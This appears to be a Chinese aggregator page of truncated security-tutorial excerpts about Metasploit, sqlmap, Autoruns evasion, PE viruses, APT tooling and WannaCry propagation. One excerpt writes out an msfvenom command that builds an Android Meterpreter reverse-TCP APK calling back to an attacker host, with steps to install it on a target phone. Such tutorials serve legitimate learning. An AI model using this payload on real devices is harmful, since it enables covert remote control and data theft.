metasploit

Metasploitable2-Telnet的登录提权

一世执手 提交于 2020-08-14 08:55:41
0x00 简介 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 工具:kali下的Metasploit 靶机:Metasploitable2 环境: kali:192.168.84.137 靶机:192.168.84.141 0x01 Telnet介绍 Telnet协议是TCP/IP协议族中的一员,是internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。 虽然telnet较为简单实用也很方便,但是在格外注重安全的现代网络技术中,telnet并不被重用。原因在于telnet是一个明文传送协议,它将用户的所有内容,包括用户名和密码都以明文在互联网上传送,具有一定的安全隐患,因此许多服务器都会选择禁用telnet服务。如果我们要使用telnet的远程登录,使用前应在远端服务器上检查并设置允许telnet服务的功能。 Telnet服务端默认情况下使用23端口。 0x02 Telent的登录提权 首先就是nmap对靶机进行23端口的扫描。 扫描之后,可以知道23端口是开启的。 那么启动Metasploit

KALI 之 Msf 控制 Android手机

心不动则不痛 提交于 2020-08-12 02:41:23
中华人民共和国网络安全法 警告:请勿用于非法用途,后果自负! 0.环境 虚拟机 KaliLinux 手机 Redmi 6A 同一局域网下 1.查看控制端IP ifconfig 即192.168.xx.xxx 2.生成木马程序 >>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk -设置监听端主机lhost=192.168.xx.xxx -设置监听端主机端口lhost=5555 -保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk 自动生成了一个10179 bytes 大小的程序 3.把hugboyMsf.apk安装到目标手机并运行 1).如何让虚拟机与主机数据分享,进而发送到手机上安装? 安装VMtools直接拖到本地桌面 Apt update Apt install open-vm-tools-desktop fuse Reboot 重启生效 2).发送到手机安装,忽略警告,点击继续。。。 4.打开metasploit工具 5.设置payload use exploit/multi/handler set payload android/meterpreter/reverse

那些“躲避”微软autoruns工具的方法

℡╲_俬逩灬. 提交于 2020-08-11 08:56:55
【转】 http://bobao.360.cn/learning/detail/4666.html 背景 在第七届的DerbyCon大会上, Chris Bisnett和Kyle Hanslovan发表了一个名叫“Evading Autoruns”的演讲。在这篇演讲中, Kyle 和Chris展示了绕过微软Sysinternals Autoruns工具检查的方法。他们主要利用“PATHEXT”这个Windows环境变量以及Microsoft签名的可执行文件来持久运行注册表项。由于这些家伙的演讲实在是太精彩了,因此我强烈推荐你们看一下他们以下发布的与演讲有关的资料: Talk Slides PoC Example “shady” INF Github 摘要 从***者的视角来看,获取对远端机器的访问权限是关键;而从安全防护的视角来看,发现***者的踪迹同样重要。在这次演讲中,Kyle 和Chris披露了几种“高端”技术用于绕过最常见的系统监视工具,这些“高端”技术涉及重新创建注册表中的run key、非常规利用搜索顺序以及利用可信应用程序。为了补充他们的技术说明,针对每种绕过方法本文都将包括demo演示和检测建议。现在我们已经回顾了上述所有的材料,下面我们对该演讲中有趣的技术内容进行深入探讨。 Autoruns扩展搜索顺序技术 在幻灯片68页,我们看到一个有趣的声明,具体如下图所示:

sqlmap详细使用教程

有些话、适合烂在心里 提交于 2020-08-09 05:27:18
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 sqlmap常用命令 -h 显示基本帮助信息 -hh 显示高级帮助信息 --version 显示版本号 -v 详细等级(0-6 默认 1) 0:只显示python错误以及重要信息 1:显示信息以及警告 2:显示debug消息 3:显示注入payload 4:显示http请求 5:显示http响应头· 6:显示http响应内容 Target: -u 指定目标url -d 直接连接数据库 -l 从burp代理日志的解析目标 -r 从文件中加载http请求 -g 从google dork的结果作为目标url -c 从INI配置文件中加载选项 Request -A 指定user-agent头 -H 额外的header -method= 指定HTTP方法(GET/POST) --data= 通过POST提交数据 --param-del= 指定参数分隔符 --cookie= 指定cookie的值 --cookie-del= 指定cookie分隔符 --drop-set-cookie 扔掉response中的set-cookie头 --random-agent 使用随机的user-agent头 --host= 设置host头 --referer= 指定referer头 -

[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解

邮差的信 提交于 2020-08-08 19:07:18
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~ 作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~ 文章目录 一.PE病毒概念 二.PE病毒的分类 三.传统文件感染型 1.感染思路 2.PE病毒典型案例 3.关键技术 (1) 重定位 (2) API函数自获取 (3) 目标程序遍历搜索 (4) 文件感染 四.捆绑释放型 五.系统感染型 1.控制权再次获取 2.病毒的传播方式 六.总结 PS:本文参考了《软件安全》视频、安全网站和参考文献中的文章(详见参考文献),并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。 作者的github资源: 软件安全: https://github.com

[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器(强推Seak老师)

爱⌒轻易说出口 提交于 2020-08-04 18:11:51
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。 作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~ 文章目录 一.从恶意代码的发展看APT攻击 二.高级恶意代码工程体系——A2PT的攻击武器 三.普通APT组织的自研恶意代码 四.商用恶意代码 五.无恶意代码作业、开源和免费工具 六.总结与思考 PS:本文参考了github、安全网站和参考文献中的文章(详见参考文献),并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。 作者的github资源: 软件安全

溢出漏洞利用原理及其检测原理——就是代码注入shellcode,检测可以利用静态签名

早过忘川 提交于 2020-07-25 11:36:14
【漏洞解析】举个小栗子说明溢出漏洞利用原理及其检测原理 溢出漏洞利用,是指在存在缓存溢出安全漏洞的计算机中,攻击者可以用超出常规长度的字符数来填满一个域,通常是内存区地址。在某些情况下,这些过量的字符能够作为“可执行”代码来运行。从而使得攻击者可以不受安全措施的约束进行攻击行为。本文以实例详细说明溢出漏洞的利用过程,感兴趣的朋友们来动手操作一把吧! 一、溢出漏洞利用概述 溢出漏洞利用,是指在存在缓存溢出安全漏洞的计算机中,攻击者可以用超出常规长度的字符数来填满一个域,通常是内存区地址。在某些情况下,这些过量的字符能够作为“可执行”代码来运行。从而使得攻击者可以不受安全措施的约束进行攻击行为。 下面以栈布局说明溢出漏洞利用过程。 正常栈布局 RBP : 栈基地址寄存器,指向栈底地址; RSP : 栈顶寄存器,指向栈顶地址; RIP:指令地址寄存器,指向指令所在地址。 函数调用时,当前函数的下一个执行命令入栈(RIP,即RET返回地址),RBP入栈,然后把当前RSP的值给RBP; RSP根据函数执行而移动,根据空间需要移动所指位置,例如入栈局部变量,RSP的值会跟着减小,保证RSP一直指向栈顶。 栈溢出利用过程说明 栈上的内容填充是从低地址向高地址填充的。 请注意,我们开始使坏啦: 1)给var1填充巧妙构造的超长字符串,超过var1高地址(0x7fffffffdee8)

[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读

微笑、不失礼 提交于 2020-05-06 18:02:33
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~ 作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~ 文章目录 一.WannaCry背景 二.WannaCry传播机制源码详解 1.WannaCry蠕虫传播流程 2.程序入口Start 3.域名开关WinMain 4.参数判断sub_408090 5.蠕虫安装流程sub_407F20 6.蠕虫服务传播流程sub_4080000 7.蠕虫初始化操作sub_407B90 8.局域网传播sub_407720 9.公网传播sub_407840 10

centos 6中安装docker,在docker中安装metasploit

随声附和 提交于 2020-05-04 00:37:22
1、升级内核,2、安装ruby,3、安装docker,4、在docker中下载metasploit 首先检查内核版本,内核版本Linux kernel至少3.8以上 uname -r 我的因为安装bbr升级了内核,所以不用升级内核 CentOS6下安装docker - CSDN博客 https://blog.csdn.net/Smith_My_/article/details/73550822 ----------------------- 菜鸟教程的docker教程 CentOS Docker 安装 | 菜鸟教程 http://www.runoob.com/docker/centos-docker-install.html ---------------------- 我根据这个教程安装了ruby Centos6.5安装Metasploit记录 - CSDN博客 https://blog.csdn.net/wyvbboy/article/details/51526640 ------------------------------------------------------------------------ 1、升级内核,2、安装ruby,3、安装docker,4、在docker中下载metasploit ---------- CentOS6

MetaSploit攻击实例讲解------工具Meterpreter常用功能介绍(kali linux 2016.2(rolling))(详细)

一笑奈何 提交于 2020-05-02 16:51:58
  不多说,直接上干货! 说在前面的话   注意啦:Meterpreter的命令非常之多,本篇博客下面给出了所有,大家可以去看看。给出了详细的中文   由于篇幅原因,我只使用如下较常用的命令。   这篇博客,利用下面的这个xploit/windows/browser/ms10_046_shortcut_icon_dllloader漏洞来带领大家。 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库之后的切换到指定的工作空间   这个大家,养成好习惯,进入到这里。 root@kali:~ # msfconsole . ~+P``````-o+:. -o+ :. . +oooyysyyssyyssyddh++os- ````` ``````````````` ` +++++++++++++++++++++++sydhyoyso/:.````...`...- /// ::+ohhyosyyosyy/+om++:ooo /// o ++++ ////// /~~~~ ////// /++++++++++++++++ooyysoyysosso+++++++++++++++++++